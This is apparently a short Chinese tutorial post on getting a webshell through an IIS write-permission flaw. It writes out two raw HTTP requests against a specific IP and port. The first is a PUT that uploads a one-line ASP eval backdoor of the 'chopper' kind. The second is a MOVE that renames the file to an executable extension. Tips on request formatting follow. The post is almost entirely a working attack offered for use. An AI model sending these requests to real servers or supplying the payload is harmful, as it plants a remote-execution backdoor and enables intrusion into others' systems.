针对IIS写权限漏洞的获取webshell方法

向网站写入2.txt 内容为一句话木马

PUT /2.txt HTTP/1.1

Destination: /teslt.asp;.jpg

Host: 219.153.49.228:43289

Content-Length: 4

 

<%eval request("chopper")%>

 

针对IIS写权限漏洞的获取webshell方法_第1张图片

改2.txt为2.asPp

MOVE /2.txt HTTP/1.1
Destination: /2.asPp
Host: 219.153.49.228:43289
Content-Length: 29

<%eval request("chopper")%>
 

针对IIS写权限漏洞的获取webshell方法_第2张图片

犯得错误

1、PUT、MOVE方法要大写

2、每一行的最后不能有空格

你可能感兴趣的:(iis漏洞)